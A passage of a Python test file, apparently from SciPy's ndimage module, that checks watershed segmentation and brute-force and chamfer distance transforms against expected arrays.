        # 8-connected watershed: marker 1 (inside the square outline) floods
        # the whole square; marker -1 claims the remaining background
        data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 1, 0, 0, 0, 1, 0],
                            [0, 1, 0, 0, 0, 1, 0],
                            [0, 1, 0, 0, 0, 1, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0]], numpy.uint8)
        markers = numpy.array([[-1, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 1, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0]], numpy.int8)
        out = ndimage.watershed_ift(data, markers, structure=[[1, 1, 1],
                                                              [1, 1, 1],
                                                              [1, 1, 1]])
        expected = [[-1, -1, -1, -1, -1, -1, -1],
                    [-1, 1, 1, 1, 1, 1, -1],
                    [-1, 1, 1, 1, 1, 1, -1],
                    [-1, 1, 1, 1, 1, 1, -1],
                    [-1, 1, 1, 1, 1, 1, -1],
                    [-1, 1, 1, 1, 1, 1, -1],
                    [-1, -1, -1, -1, -1, -1, -1],
                    [-1, -1, -1, -1, -1, -1, -1]]
        assert_array_almost_equal(out, expected)
    def test_watershed_ift02(self):
        # same input as test_watershed_ift01 but with the default (4-connected)
        # structure: the corners of the square stay with the background marker
        data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 1, 0, 0, 0, 1, 0],
                            [0, 1, 0, 0, 0, 1, 0],
                            [0, 1, 0, 0, 0, 1, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0]], numpy.uint8)
        markers = numpy.array([[-1, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 1, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0]], numpy.int8)
        out = ndimage.watershed_ift(data, markers)
        expected = [[-1, -1, -1, -1, -1, -1, -1],
                    [-1, -1, 1, 1, 1, -1, -1],
                    [-1, 1, 1, 1, 1, 1, -1],
                    [-1, 1, 1, 1, 1, 1, -1],
                    [-1, 1, 1, 1, 1, 1, -1],
                    [-1, -1, 1, 1, 1, -1, -1],
                    [-1, -1, -1, -1, -1, -1, -1],
                    [-1, -1, -1, -1, -1, -1, -1]]
        assert_array_almost_equal(out, expected)
    def test_watershed_ift03(self):
        # two positive markers (2 and 3) split the double square between them;
        # marker -1 takes the background (default 4-connected structure)
        data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 1, 0, 1, 0, 1, 0],
                            [0, 1, 0, 1, 0, 1, 0],
                            [0, 1, 0, 1, 0, 1, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 0, 0, 0, 0, 0]], numpy.uint8)
        markers = numpy.array([[0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 2, 0, 3, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, -1]], numpy.int8)
        out = ndimage.watershed_ift(data, markers)
        expected = [[-1, -1, -1, -1, -1, -1, -1],
                    [-1, -1, 2, -1, 3, -1, -1],
                    [-1, 2, 2, 3, 3, 3, -1],
                    [-1, 2, 2, 3, 3, 3, -1],
                    [-1, 2, 2, 3, 3, 3, -1],
                    [-1, -1, 2, -1, 3, -1, -1],
                    [-1, -1, -1, -1, -1, -1, -1]]
        assert_array_almost_equal(out, expected)
    def test_watershed_ift04(self):
        # as test_watershed_ift03 but with an 8-connected structure: markers
        # 2 and 3 flood the full square, leaving only the outer background to -1
        data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 1, 0, 1, 0, 1, 0],
                            [0, 1, 0, 1, 0, 1, 0],
                            [0, 1, 0, 1, 0, 1, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 0, 0, 0, 0, 0]], numpy.uint8)
        markers = numpy.array([[0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 2, 0, 3, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, -1]],
                              numpy.int8)
        out = ndimage.watershed_ift(data, markers,
                                    structure=[[1, 1, 1],
                                               [1, 1, 1],
                                               [1, 1, 1]])
        expected = [[-1, -1, -1, -1, -1, -1, -1],
                    [-1, 2, 2, 3, 3, 3, -1],
                    [-1, 2, 2, 3, 3, 3, -1],
                    [-1, 2, 2, 3, 3, 3, -1],
                    [-1, 2, 2, 3, 3, 3, -1],
                    [-1, 2, 2, 3, 3, 3, -1],
                    [-1, -1, -1, -1, -1, -1, -1]]
        assert_array_almost_equal(out, expected)
    def test_watershed_ift05(self):
        # mirror of test_watershed_ift04 with the marker labels swapped
        # (3 on the left, 2 on the right) — output labels swap accordingly
        data = numpy.array([[0, 0, 0, 0, 0, 0, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 1, 0, 1, 0, 1, 0],
                            [0, 1, 0, 1, 0, 1, 0],
                            [0, 1, 0, 1, 0, 1, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 0, 0, 0, 0, 0]], numpy.uint8)
        markers = numpy.array([[0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 3, 0, 2, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, -1]],
                              numpy.int8)
        out = ndimage.watershed_ift(data, markers,
                                    structure=[[1, 1, 1],
                                               [1, 1, 1],
                                               [1, 1, 1]])
        expected = [[-1, -1, -1, -1, -1, -1, -1],
                    [-1, 3, 3, 2, 2, 2, -1],
                    [-1, 3, 3, 2, 2, 2, -1],
                    [-1, 3, 3, 2, 2, 2, -1],
                    [-1, 3, 3, 2, 2, 2, -1],
                    [-1, 3, 3, 2, 2, 2, -1],
                    [-1, -1, -1, -1, -1, -1, -1]]
        assert_array_almost_equal(out, expected)
    def test_watershed_ift06(self):
        # marker placed on the structure's top edge; 8-connected flooding
        # claims the upper region, background -1 keeps the rest
        data = numpy.array([[0, 1, 0, 0, 0, 1, 0],
                            [0, 1, 0, 0, 0, 1, 0],
                            [0, 1, 0, 0, 0, 1, 0],
                            [0, 1, 1, 1, 1, 1, 0],
                            [0, 0, 0, 0, 0, 0, 0],
                            [0, 0, 0, 0, 0, 0, 0]], numpy.uint8)
        markers = numpy.array([[-1, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 1, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0]], numpy.int8)
        out = ndimage.watershed_ift(data, markers,
                                    structure=[[1, 1, 1],
                                               [1, 1, 1],
                                               [1, 1, 1]])
        expected = [[-1, 1, 1, 1, 1, 1, -1],
                    [-1, 1, 1, 1, 1, 1, -1],
                    [-1, 1, 1, 1, 1, 1, -1],
                    [-1, 1, 1, 1, 1, 1, -1],
                    [-1, -1, -1, -1, -1, -1, -1],
                    [-1, -1, -1, -1, -1, -1, -1]]
        assert_array_almost_equal(out, expected)
    def test_watershed_ift07(self):
        # same case as test_watershed_ift06, but writing into a preallocated,
        # non-contiguous (transposed) output array
        shape = (7, 6)
        data = numpy.zeros(shape, dtype=numpy.uint8)
        data = data.transpose()
        data[...] = numpy.array([[0, 1, 0, 0, 0, 1, 0],
                                 [0, 1, 0, 0, 0, 1, 0],
                                 [0, 1, 0, 0, 0, 1, 0],
                                 [0, 1, 1, 1, 1, 1, 0],
                                 [0, 0, 0, 0, 0, 0, 0],
                                 [0, 0, 0, 0, 0, 0, 0]], numpy.uint8)
        markers = numpy.array([[-1, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 1, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0],
                               [0, 0, 0, 0, 0, 0, 0]], numpy.int8)
        out = numpy.zeros(shape, dtype=numpy.int16)
        out = out.transpose()
        ndimage.watershed_ift(data, markers,
                              structure=[[1, 1, 1],
                                         [1, 1, 1],
                                         [1, 1, 1]],
                              output=out)
        expected = [[-1, 1, 1, 1, 1, 1, -1],
                    [-1, 1, 1, 1, 1, 1, -1],
                    [-1, 1, 1, 1, 1, 1, -1],
                    [-1, 1, 1, 1, 1, 1, -1],
                    [-1, -1, -1, -1, -1, -1, -1],
                    [-1, -1, -1, -1, -1, -1, -1]]
        assert_array_almost_equal(out, expected)
    def test_distance_transform_bf01(self):
        # brute force (bf) distance transform
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out, ft = ndimage.distance_transform_bf(data, 'euclidean',
                                                    return_indices=True)
            # `expected` holds the SQUARED euclidean distances, hence the
            # out * out comparison below
            expected = [[0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 1, 1, 1, 0, 0, 0],
                        [0, 0, 1, 2, 4, 2, 1, 0, 0],
                        [0, 0, 1, 4, 8, 4, 1, 0, 0],
                        [0, 0, 1, 2, 4, 2, 1, 0, 0],
                        [0, 0, 0, 1, 1, 1, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0]]
            assert_array_almost_equal(out * out, expected)
            # per-axis index arrays returned for return_indices=True
            expected = [[[0, 0, 0, 0, 0, 0, 0, 0, 0],
                         [1, 1, 1, 1, 1, 1, 1, 1, 1],
                         [2, 2, 2, 2, 1, 2, 2, 2, 2],
                         [3, 3, 3, 2, 1, 2, 3, 3, 3],
                         [4, 4, 4, 4, 6, 4, 4, 4, 4],
                         [5, 5, 6, 6, 7, 6, 6, 5, 5],
                         [6, 6, 6, 7, 7, 7, 6, 6, 6],
                         [7, 7, 7, 7, 7, 7, 7, 7, 7],
                         [8, 8, 8, 8, 8, 8, 8, 8, 8]],
                        [[0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 2, 4, 6, 6, 7, 8],
                         [0, 1, 1, 2, 4, 6, 7, 7, 8],
                         [0, 1, 1, 1, 6, 7, 7, 7, 8],
                         [0, 1, 2, 2, 4, 6, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8]]]
            assert_array_almost_equal(ft, expected)
    def test_distance_transform_bf02(self):
        # brute force transform with the cityblock (L1) metric
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out, ft = ndimage.distance_transform_bf(data, 'cityblock',
                                                    return_indices=True)
            expected = [[0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 1, 1, 1, 0, 0, 0],
                        [0, 0, 1, 2, 2, 2, 1, 0, 0],
                        [0, 0, 1, 2, 3, 2, 1, 0, 0],
                        [0, 0, 1, 2, 2, 2, 1, 0, 0],
                        [0, 0, 0, 1, 1, 1, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0]]
            assert_array_almost_equal(out, expected)
            # per-axis index arrays returned for return_indices=True
            expected = [[[0, 0, 0, 0, 0, 0, 0, 0, 0],
                         [1, 1, 1, 1, 1, 1, 1, 1, 1],
                         [2, 2, 2, 2, 1, 2, 2, 2, 2],
                         [3, 3, 3, 3, 1, 3, 3, 3, 3],
                         [4, 4, 4, 4, 7, 4, 4, 4, 4],
                         [5, 5, 6, 7, 7, 7, 6, 5, 5],
                         [6, 6, 6, 7, 7, 7, 6, 6, 6],
                         [7, 7, 7, 7, 7, 7, 7, 7, 7],
                         [8, 8, 8, 8, 8, 8, 8, 8, 8]],
                        [[0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 2, 4, 6, 6, 7, 8],
                         [0, 1, 1, 1, 4, 7, 7, 7, 8],
                         [0, 1, 1, 1, 4, 7, 7, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8]]]
            assert_array_almost_equal(expected, ft)
    def test_distance_transform_bf03(self):
        # brute force transform with the chessboard (L-infinity) metric
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out, ft = ndimage.distance_transform_bf(data, 'chessboard',
                                                    return_indices=True)
            expected = [[0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 1, 1, 1, 0, 0, 0],
                        [0, 0, 1, 1, 2, 1, 1, 0, 0],
                        [0, 0, 1, 2, 2, 2, 1, 0, 0],
                        [0, 0, 1, 1, 2, 1, 1, 0, 0],
                        [0, 0, 0, 1, 1, 1, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0]]
            assert_array_almost_equal(out, expected)
            # per-axis index arrays returned for return_indices=True
            expected = [[[0, 0, 0, 0, 0, 0, 0, 0, 0],
                         [1, 1, 1, 1, 1, 1, 1, 1, 1],
                         [2, 2, 2, 2, 1, 2, 2, 2, 2],
                         [3, 3, 4, 2, 2, 2, 4, 3, 3],
                         [4, 4, 5, 6, 6, 6, 5, 4, 4],
                         [5, 5, 6, 6, 7, 6, 6, 5, 5],
                         [6, 6, 6, 7, 7, 7, 6, 6, 6],
                         [7, 7, 7, 7, 7, 7, 7, 7, 7],
                         [8, 8, 8, 8, 8, 8, 8, 8, 8]],
                        [[0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 2, 5, 6, 6, 7, 8],
                         [0, 1, 1, 2, 6, 6, 7, 7, 8],
                         [0, 1, 1, 2, 6, 7, 7, 7, 8],
                         [0, 1, 2, 2, 6, 6, 7, 7, 8],
                         [0, 1, 2, 4, 5, 6, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8]]]
            assert_array_almost_equal(ft, expected)
    def test_distance_transform_bf04(self):
        # every combination of returned vs. preallocated distances/indices
        # must agree with the plain return_indices=True reference result
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
            # reference distances and feature-transform indices
            tdt, tft = ndimage.distance_transform_bf(data, return_indices=1)
            dts = []
            fts = []
            # distances written into a preallocated array
            dt = numpy.zeros(data.shape, dtype=numpy.float64)
            ndimage.distance_transform_bf(data, distances=dt)
            dts.append(dt)
            # indices only, returned
            ft = ndimage.distance_transform_bf(
                data, return_distances=False, return_indices=1)
            fts.append(ft)
            # indices only, written into a preallocated array
            ft = numpy.indices(data.shape, dtype=numpy.int32)
            ndimage.distance_transform_bf(
                data, return_distances=False, return_indices=True, indices=ft)
            fts.append(ft)
            # both returned
            dt, ft = ndimage.distance_transform_bf(
                data, return_indices=1)
            dts.append(dt)
            fts.append(ft)
            # preallocated distances, returned indices
            dt = numpy.zeros(data.shape, dtype=numpy.float64)
            ft = ndimage.distance_transform_bf(
                data, distances=dt, return_indices=True)
            dts.append(dt)
            fts.append(ft)
            # returned distances, preallocated indices
            ft = numpy.indices(data.shape, dtype=numpy.int32)
            dt = ndimage.distance_transform_bf(
                data, return_indices=True, indices=ft)
            dts.append(dt)
            fts.append(ft)
            # both preallocated
            dt = numpy.zeros(data.shape, dtype=numpy.float64)
            ft = numpy.indices(data.shape, dtype=numpy.int32)
            ndimage.distance_transform_bf(
                data, distances=dt, return_indices=True, indices=ft)
            dts.append(dt)
            fts.append(ft)
            for dt in dts:
                assert_array_almost_equal(tdt, dt)
            for ft in fts:
                assert_array_almost_equal(tft, ft)
    def test_distance_transform_bf05(self):
        # euclidean brute force transform with uniform sampling=[2, 2]:
        # squared distances are 4x those of the unit-sampling case
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out, ft = ndimage.distance_transform_bf(
                data, 'euclidean', return_indices=True, sampling=[2, 2])
            # squared distances, hence the out * out comparison below
            expected = [[0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 4, 4, 4, 0, 0, 0],
                        [0, 0, 4, 8, 16, 8, 4, 0, 0],
                        [0, 0, 4, 16, 32, 16, 4, 0, 0],
                        [0, 0, 4, 8, 16, 8, 4, 0, 0],
                        [0, 0, 0, 4, 4, 4, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0]]
            assert_array_almost_equal(out * out, expected)
            # per-axis index arrays returned for return_indices=True
            expected = [[[0, 0, 0, 0, 0, 0, 0, 0, 0],
                         [1, 1, 1, 1, 1, 1, 1, 1, 1],
                         [2, 2, 2, 2, 1, 2, 2, 2, 2],
                         [3, 3, 3, 2, 1, 2, 3, 3, 3],
                         [4, 4, 4, 4, 6, 4, 4, 4, 4],
                         [5, 5, 6, 6, 7, 6, 6, 5, 5],
                         [6, 6, 6, 7, 7, 7, 6, 6, 6],
                         [7, 7, 7, 7, 7, 7, 7, 7, 7],
                         [8, 8, 8, 8, 8, 8, 8, 8, 8]],
                        [[0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 2, 4, 6, 6, 7, 8],
                         [0, 1, 1, 2, 4, 6, 7, 7, 8],
                         [0, 1, 1, 1, 6, 7, 7, 7, 8],
                         [0, 1, 2, 2, 4, 6, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8]]]
            assert_array_almost_equal(ft, expected)
    def test_distance_transform_bf06(self):
        # euclidean brute force transform with anisotropic sampling=[2, 1]
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out, ft = ndimage.distance_transform_bf(
                data, 'euclidean', return_indices=True, sampling=[2, 1])
            # squared distances, hence the out * out comparison below
            expected = [[0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 1, 4, 1, 0, 0, 0],
                        [0, 0, 1, 4, 8, 4, 1, 0, 0],
                        [0, 0, 1, 4, 9, 4, 1, 0, 0],
                        [0, 0, 1, 4, 8, 4, 1, 0, 0],
                        [0, 0, 0, 1, 4, 1, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0],
                        [0, 0, 0, 0, 0, 0, 0, 0, 0]]
            assert_array_almost_equal(out * out, expected)
            # per-axis index arrays returned for return_indices=True
            expected = [[[0, 0, 0, 0, 0, 0, 0, 0, 0],
                         [1, 1, 1, 1, 1, 1, 1, 1, 1],
                         [2, 2, 2, 2, 2, 2, 2, 2, 2],
                         [3, 3, 3, 3, 2, 3, 3, 3, 3],
                         [4, 4, 4, 4, 4, 4, 4, 4, 4],
                         [5, 5, 5, 5, 6, 5, 5, 5, 5],
                         [6, 6, 6, 6, 7, 6, 6, 6, 6],
                         [7, 7, 7, 7, 7, 7, 7, 7, 7],
                         [8, 8, 8, 8, 8, 8, 8, 8, 8]],
                        [[0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 2, 6, 6, 6, 7, 8],
                         [0, 1, 1, 1, 6, 7, 7, 7, 8],
                         [0, 1, 1, 1, 7, 7, 7, 7, 8],
                         [0, 1, 1, 1, 6, 7, 7, 7, 8],
                         [0, 1, 2, 2, 4, 6, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8]]]
            assert_array_almost_equal(ft, expected)
    def test_distance_transform_cdt01(self):
        # chamfer type distance (cdt) transform
        # cityblock cdt distances must match the brute-force reference
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out, ft = ndimage.distance_transform_cdt(
                data, 'cityblock', return_indices=True)
            bf = ndimage.distance_transform_bf(data, 'cityblock')
            assert_array_almost_equal(bf, out)
            # per-axis index arrays returned for return_indices=True
            expected = [[[0, 0, 0, 0, 0, 0, 0, 0, 0],
                         [1, 1, 1, 1, 1, 1, 1, 1, 1],
                         [2, 2, 2, 1, 1, 1, 2, 2, 2],
                         [3, 3, 2, 1, 1, 1, 2, 3, 3],
                         [4, 4, 4, 4, 1, 4, 4, 4, 4],
                         [5, 5, 5, 5, 7, 7, 6, 5, 5],
                         [6, 6, 6, 6, 7, 7, 6, 6, 6],
                         [7, 7, 7, 7, 7, 7, 7, 7, 7],
                         [8, 8, 8, 8, 8, 8, 8, 8, 8]],
                        [[0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 1, 1, 4, 7, 7, 7, 8],
                         [0, 1, 1, 1, 4, 5, 6, 7, 8],
                         [0, 1, 2, 2, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8]]]
            assert_array_almost_equal(ft, expected)
    def test_distance_transform_cdt02(self):
        # chessboard cdt distances must match the brute-force reference
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
            out, ft = ndimage.distance_transform_cdt(data, 'chessboard',
                                                     return_indices=True)
            bf = ndimage.distance_transform_bf(data, 'chessboard')
            assert_array_almost_equal(bf, out)
            # per-axis index arrays returned for return_indices=True
            expected = [[[0, 0, 0, 0, 0, 0, 0, 0, 0],
                         [1, 1, 1, 1, 1, 1, 1, 1, 1],
                         [2, 2, 2, 1, 1, 1, 2, 2, 2],
                         [3, 3, 2, 2, 1, 2, 2, 3, 3],
                         [4, 4, 3, 2, 2, 2, 3, 4, 4],
                         [5, 5, 4, 6, 7, 6, 4, 5, 5],
                         [6, 6, 6, 6, 7, 7, 6, 6, 6],
                         [7, 7, 7, 7, 7, 7, 7, 7, 7],
                         [8, 8, 8, 8, 8, 8, 8, 8, 8]],
                        [[0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 2, 3, 4, 6, 7, 8],
                         [0, 1, 1, 2, 2, 6, 6, 7, 8],
                         [0, 1, 1, 1, 2, 6, 7, 7, 8],
                         [0, 1, 1, 2, 6, 6, 7, 7, 8],
                         [0, 1, 2, 2, 5, 6, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8],
                         [0, 1, 2, 3, 4, 5, 6, 7, 8]]]
            assert_array_almost_equal(ft, expected)
    def test_distance_transform_cdt03(self):
        # every combination of returned vs. preallocated distances/indices
        # must agree with the plain return_indices=True reference result
        for type_ in self.types:
            data = numpy.array([[0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 1, 1, 1, 1, 1, 0, 0],
                                [0, 0, 0, 1, 1, 1, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0],
                                [0, 0, 0, 0, 0, 0, 0, 0, 0]], type_)
            # reference distances and feature-transform indices
            tdt, tft = ndimage.distance_transform_cdt(data, return_indices=True)
            dts = []
            fts = []
            # distances written into a preallocated array (cdt is integer-valued)
            dt = numpy.zeros(data.shape, dtype=numpy.int32)
            ndimage.distance_transform_cdt(data, distances=dt)
            dts.append(dt)
            # indices only, returned
            ft = ndimage.distance_transform_cdt(
                data, return_distances=False, return_indices=True)
            fts.append(ft)
            # indices only, written into a preallocated array
            ft = numpy.indices(data.shape, dtype=numpy.int32)
            ndimage.distance_transform_cdt(
                data, return_distances=False, return_indices=True, indices=ft)
            fts.append(ft)
            # both returned
            dt, ft = ndimage.distance_transform_cdt(
